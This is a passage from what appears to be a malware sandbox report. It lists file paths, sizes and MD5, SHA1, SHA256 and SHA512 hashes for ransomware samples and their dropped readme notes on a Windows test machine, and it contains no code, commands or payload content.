                                                                                                                                                                                                                                                                                                                                          52f1e68a5f17968cf2f36b4a199fea9bb7104ce19c8e3c98d2448b470837a12381afb991516ba316bb52dbaa36e1bfed9b67903edce00f30fd50906a5646c979

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00384\HEUR-Trojan-Ransom.MSIL.Blocker.gen-4e2d6c20e77bc5d58a2452cc2b1102816c925528cccb96f7f464aa120f4535e1.exe
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1.4MB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          121f0983e67c8a31690b2cb8e126a9fa

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          17bc3619f8b76fcaf972ad4a013cff9f7d04ea29

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          4e2d6c20e77bc5d58a2452cc2b1102816c925528cccb96f7f464aa120f4535e1

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          276ce76000aeebd4d9ae79b34a4aa91f93b6687f76476785944d646ff2771323c4453705454de0aea67ef1eae4c064970d202cd5e6d783ec064fcd5bafda2819

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00384\HEUR-Trojan-Ransom.MSIL.Gen.gen-ca34aa0db41b2e1518866480b454226000efaf57e389f3b1d6deaa8e25cba712.exe
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1.4MB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          c6d83ae88c6b6528854b679938b4babc

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          1f21cc6d11bd9df1f06413da44bb265fbb1f0240

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          ca34aa0db41b2e1518866480b454226000efaf57e389f3b1d6deaa8e25cba712

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          cee5add8a7db5c44e98ccbda3e45a8f7dbbdee1bab5f17ae2407fe122b7f55c2a98d16ee28e87075f087c96233c0b5088c9c4ae3df2d8c63802ee114aae182da

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00384\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-bcc2e28f1351fa4d89b4f7cf96abe57a4d723a411540cff37ed5e912b6740553.exe
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          283KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          1e5fe55f9c706ccabda1cd022ab8857e

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          6905fffba594a37ed9a8c288e39fc44423dec972

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          bcc2e28f1351fa4d89b4f7cf96abe57a4d723a411540cff37ed5e912b6740553

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          b4a16ed16fe7ba555534afe18f52bdff4764803bfbff8bd5bda8aab4f5209f584b88a0f68c3461d0cd1b9af634355fd11aa80fc5ede4ff4f10dbde3152ac6f83

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00384\HEUR-Trojan-Ransom.Win32.Blocker.gen-2a161ebe85ca77dbfea4ddb26b40acf95d4b58466c1a0262d449481669cd6b1c.exe
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1.3MB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          efa6aa1464fee292a51628c4d8f18254

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          f41c2ea8482a78f964991d67aa02911040a40390

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          2a161ebe85ca77dbfea4ddb26b40acf95d4b58466c1a0262d449481669cd6b1c

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          757d66aaa0ab6be4d888ea0b314d2febbbce3139cfbccb1a7044442cf879a30388b3a307ae8e5a3c6060ed28a345a6f0b6fa0793f6e569adce6ecb79b8c4ccb5

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00384\HEUR-Trojan-Ransom.Win32.Blocker.vho-2511d92821ab8016b549b74b4eae14a94f47ef9de3f94840f5e80d880329b79f.exe
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          18.5MB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          738d2948951248a36a33262f6f136d39

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          b8595c18c603f24353b9a674988a620d299bc4d6

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          2511d92821ab8016b549b74b4eae14a94f47ef9de3f94840f5e80d880329b79f

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          58a9fabf98a340010e1c13689cd592642f7d85922ffd96b01983bd7fb4643f79c579738c3017a546e0a2fd84f72f03f8a14ca93134072165ab996f9e5b0f39f7

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00384\HEUR-Trojan-Ransom.Win32.Generic-d1827184ad7bce4ce6c03b2f1c7fd72b84d9659ff2b68e65abcacf21df56b66f.exe
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          94c638418ecb08d65af9cafebb895c84

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          70d5e40b8198cea002d5df7313511b2c852a109a

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          d1827184ad7bce4ce6c03b2f1c7fd72b84d9659ff2b68e65abcacf21df56b66f

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          56ea71a271ce12f6384e830d1a1acb11e1f842f87694ac845c128e8b6e72d9ee6d2e5d2f8328c12a3536b72dbc4bdd89f0f03477e5e6d952129de8c1178f06b8

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00384\HEUR-Trojan-Ransom.Win32.Sodin.vho-ab0b2130063e9e9f0a58b0b18dba104eac8eccee4bdc22a341c28c6eaef40d4e.exe
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          3.8MB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          e6da0f813e09af59be3988cf0775c359

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          caaff0427241d3fc8f42421c76125aeba62e7031

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          ab0b2130063e9e9f0a58b0b18dba104eac8eccee4bdc22a341c28c6eaef40d4e

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          1ca48408a82169665346dd69114cc72742d6ca844932f7844afa04ce82e6a0c9488442387a19122529413f9cc2236fdbf94300b7aa1ae822dc1afcc4b5fd81bc

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00384\HEUR-Trojan-Ransom.Win32.Spora.gen-dbccb179b38bd0493f594f5a4bda348c397a70421d2d164144a6911863a478a1.exe
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1013KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          3ccfcaf5b48e79d8fa3ad67ef399fb91

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          892d6bab1dbd930a2c83c18e1db9b57a814be094

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          dbccb179b38bd0493f594f5a4bda348c397a70421d2d164144a6911863a478a1

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          603f4098dff11d2891e104ea02506ff21fac67a82224d719a449e9cbeb40de6e2eb1016f6f6ea51bcd2a123ac19e0fed0dbb220f34de1dd4ff5fc89bd6a0abbd

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00384\Setting\TPV.ini
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          97B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          882eff725772d97af40d0c417417168e

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          a9d0bea89a0f9b8902da88b7016d3e105b24ba75

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          a65dd8a6c142cfdb1a645d83ac1a47daf9fd879e7ab40d710f5be8e52806b891

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          b3e4510b75b5d7253f0f6224ec44b048340dc0689a95ebd77c976bc8cb4ce4aef2d5c6caab7fea6feb18f8a13ac4b8f00b988429d52c7615c861445aae1b3005

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00384\Setting\Ventas.ini
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          364B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          e4aa37b8f78b7a760d1ce69deb6792ac

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          cb593d6e7b50967f11324c6bd3e5b6de99c087d9

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          8a109319c5cb4f0763e2ec7445a127fde3f4046d66b5126063d452f1122466a7

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          be095bc670bf35cf358a9b6223e0bf14dbf94987792ef0e4d5dbf537e188a80fa937f54da8fa3d413838b925140d2332f4e205cf0058dbda50b62044e5377b86

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00384\Setting\tvov5Gi3_readme.txt
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          3KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          aedd6a9819e927fe03138250540232bd

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          7f43596961eafc6cc325db426f5e14d81c2165c9

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          82fd1cd706cedf5abe6d915120428e37a06f6288a78f37ae6fe6fecf1f1cc111

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          381513971b6e785487a7890c1045c029115b87197be76234e165166321d8468449f20cef563ba52f9584425236e2a7c057c766f42ec5e551e02060561d0ee30b

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Avaddon.bl-c7c9f8f68348fbd26aae20c9ccb1aefd1cfce63897efa4c64abe7ac480253259.exe
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          4.8MB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          affa6575a3ff529c583fab38ff9f59e5

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          a4d2dde718cc10d6ac12e4ec1f602a1050746aa5

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          c7c9f8f68348fbd26aae20c9ccb1aefd1cfce63897efa4c64abe7ac480253259

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          c7ea550c214c3d4cf0686f50e2644b6fe569397bc1d4b0363da173e9a9889ce290f33f6a4e9215aba6cf1deef0be73abdf4b44a8070204d75868d845b34a8767

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Blocker.hnwj-4a35c6475e5cb4f00788baf8c5518d1c76138fbf6f01414c86c8551b3a0c445a.exe
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          435KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          3232a1477c7ddfe9bd96d09179e67987

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          7f59e4f242c9bc4adc51dc654442a1c2e8c0fc85

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          4a35c6475e5cb4f00788baf8c5518d1c76138fbf6f01414c86c8551b3a0c445a

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          ef50b24155c27f7bbefb0890468f79f64f1e49679c8943921f6c3f0045256a95daee9cbb46d8e858aa4a72657db094f6a6498c0074637a0570f9085fa5d92d56

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Blocker.hrft-fd6fae46ffe394b11ad4613e6a6ae389ec1e5a0be83e956421ec7a2d4234f374.exe
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          1c5f7c91cbfa2288c60cebd682b90843

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          9fc08f6a8c4d9d6d24e0b786a71699189130b836

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          fd6fae46ffe394b11ad4613e6a6ae389ec1e5a0be83e956421ec7a2d4234f374

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          b58f11f066fe23a8419401b711473b04609a0c27b76f3150f230b324c2cc8ef3438b2fb14443beeaab4bfd004b8b9166bb6cc4583923d19faff8978fc0c8f196

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Blocker.mpky-294ba6e9b866afeea187e58fbb48381ce740b137dfd2efad0a3a88a584f0f32e.exe
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          8.4MB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          e98e3d7eef6ce587ee7cc387609eba1d

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          4f4b604d4a6e0cffe8e0d7159c19685abffe7456

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          294ba6e9b866afeea187e58fbb48381ce740b137dfd2efad0a3a88a584f0f32e

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          9f76c1f7c5e868b5e7dcc38c67dab0ca4bdcc9f0652024e2c59c58552315ce4488627ce5808c6662ae338f972d5c4d98215a956a9c9b8a4b679e217cc5e26ad7

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Crypmod.acap-2b287ee26c60c7fb1a507fff432e9a1ab60f570aeffe205ab60ee6437237976e.exe
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          238KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          9282dbc21ce441d78fcf77531d71290a

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          ab19e174b23440ee86f1c2cb08f77c1744afce65

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          2b287ee26c60c7fb1a507fff432e9a1ab60f570aeffe205ab60ee6437237976e

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          a07252706b5329e0148ccc88ee44b58d5b8027750ba952e8f03f61b6b92ee3c69041b658a147e3522df539766b557ab2f61430db075efae869976ac6d2ec5409

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Crypmod.acbg-c61275dc217382afc9b41065e26bab842df544b820292d2616276d54bdaf611f.exe
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          548KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          6db216c787e6c53db5c7043e7b24c1ea

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          49d7d8279e5b69f5d7d8a0c16d23dcbf0dda4ccb

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          c61275dc217382afc9b41065e26bab842df544b820292d2616276d54bdaf611f

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          3f676c740e127ca8f1d0ab8f3ff1e5ee29769974d653e5494df8831b123933a16d83768c65e3512025bf4fb898fcc23bc2baf90117f5966c477a91109f1ff081

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Crypren.agkf-3b8ab56fc962cd038cd696f9deb900da130649e91b2285b59157454c85a067bd.exe
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          5.4MB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          5bb6524d151debad3ff54d49a138cada

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          ea8ec6bf389ad516ba127ca7561c98ebd0b27298

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          3b8ab56fc962cd038cd696f9deb900da130649e91b2285b59157454c85a067bd

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          daf28be989d20b1dfe6dd4243e4e1499d88ee474873a4a97a881f77f39837c4d82f33b93e4662c84078e845fbfc3f0ee6a7613f0a91803e08ab90473e329e866

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Cryptor.dhe-983f1f3faf8f3736f5bb25a6185651ab7faa978210e22481b0ffc46443125e70.exe
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          a6775d5f285e22e5b9dc1bfbf47317a4

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          357ad07f7522656d2c7066e59a719ac033f4ba0a

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          983f1f3faf8f3736f5bb25a6185651ab7faa978210e22481b0ffc46443125e70

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          4aad3d130402e03315708745fae2c45a7e40426592ac88b820594085465bd7ff0f0dda0e1a7ca947453e75af7f92d55deb2cb18d3e4ceeb7a4bf5143ed66e78b

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Foreign.olxe-fdd9b8b9bb1d65cda4675bf1510b682f405c257127a7f5d3daa97643eeeab879.exe
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          f12387496f40fd4c1ab17263ca1f7396

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          8f2d374f6a056d94d74ad55883708846b28c0aa7

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          fdd9b8b9bb1d65cda4675bf1510b682f405c257127a7f5d3daa97643eeeab879

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          c7d9dcdd9aa1cf5605415b5b3d43a16ca00ceee8340758faf31dd2b4528f52ac341b6c424043d49f2107c3945614bfd5a35f0c9262ff57b334b28b18e4593b70

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.GandCrypt.eqk-c90a35ddde8c186a017a4d2e78a79b346e25ef4258ff777724fb6ecf6b95e9ee.exe
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          2.7MB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          733836b62c3671ce0d7dae57dfaedaee

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          f03b23b78c6d746c48c7b5534008328d774cd7ec

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          c90a35ddde8c186a017a4d2e78a79b346e25ef4258ff777724fb6ecf6b95e9ee

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          50384924a22e74fc5815d19ceac464a996f332829665710aee827b6da373e28921f251ef624b16c5e2fc9fca3a57cd938a884ac997a0cff0a818640c9451c36b

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Rack.izx-a451f8c1d04fb03830addc63f30791944ffe9727132a9cde286ddf0871814c71.exe
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          2.4MB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          86374f27c1a915d970be3103d22512b9

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          4285578b4ce8a7110d197d5003270dc45162c99d

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          a451f8c1d04fb03830addc63f30791944ffe9727132a9cde286ddf0871814c71

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          ff8968e97c6f5ac213df1a5fe1f4547c4753cab0c30f4375cb99dd3134fed52bbbbd7a94e0dc056d227988e06b0f54cb80c4d1fcd0be4f32dc6394c60ce8fef2

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Sfile.c-d3bf17ac4db4f367cfed8f40f92670066ca97e98d210b043e4d3b89a4971bbdf.exe
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          255KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          49e600928f341599650c3c6d7e1bdc79

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          52475b8bc39e6ee4bb16c0946d3ca83bccb752ab

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          d3bf17ac4db4f367cfed8f40f92670066ca97e98d210b043e4d3b89a4971bbdf

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          23c9040eae67f87464e8f8472044f6eafaae8c27bd1525fe5e936b0cea4dabe7aabd66b63d186eba2da0c233cc85b046d48e4c1d965fe39ca795ce93a0b22033

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Sodin.lg-7fc70136a6451dc0ac77f01552538be8db2c912ed00162337f1c77e244e0c44d.exe
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          153KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          f4095bc6938602ea174a5f6de35cbcaa

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          729ec2d0d975ab665dfc464a984d91fbd97b49bf

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          7fc70136a6451dc0ac77f01552538be8db2c912ed00162337f1c77e244e0c44d

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          48a0cadac3ec68cc55fb16bdc9a8985a3aaa466f8b2f22e9bf3eb38d7351b43b55bf1e8cd4d7db2fc266d41ac8af15dc8eafa8d132adec1276f14e698a52fd23

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\tvov5Gi3_readme.txt
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          3KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          d2a1240a9306896dc6bd238d4faff600

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          316ff8b171b640cb9a523051201ca68c945456dc

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          f6ed17b52aab31675fb578c4cfa8bcd36885f30c608a90318f8e103d4967e06c

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          359180f75897a6a3d646338bb311dfd419c588166938c9bf2f8ee1f8d00de5597ee056480b86c90ece125780bfb82abd88d159703d066685482745d0b459b0fd

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\tvov5Gi3_readme.txt
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          3KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          c922582cd390ded4d13a688da3340148

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          16eed41c539889e314bd6377c580a62008062b28

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          4bdf029799e48f2a75cb6a260026f4150b4a40792d6f4b967209c0aff0c165df

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          b6d24ec95942a79cb7407fe001094b5fa5d6a85fa868bca1c0d67171b979af9fb320b865055a1122fc36f681e9e086e29c7e3eccf2b5c25d444821b116ab30d3

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\tvov5Gi3_readme.txt
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          3KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          d718d4aedce15726b1cc9efafb001b3c

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          7de968c0794c4a856dadc18bbd1313d47b649273

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          35a485f524c3095e8a44edb8d062d50a7a8ce9eabba32bdee9f7762eddeb9277

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          ddd41484d2e8730f38b8514cea5fdb7a6875275d1bd9d67e8e57af69c60b2a7915fa301725d7a8da47e7d3d4724eb3ddfc20443ce52e45bad216fe6562b3bd1e

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\tvov5Gi3_readme.txt
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          3KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          3a98af37c969e434aaf0deb86668a9e1

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          fdb9d5aa4940fd12f73e0b2fe027dd13fd3ffa35

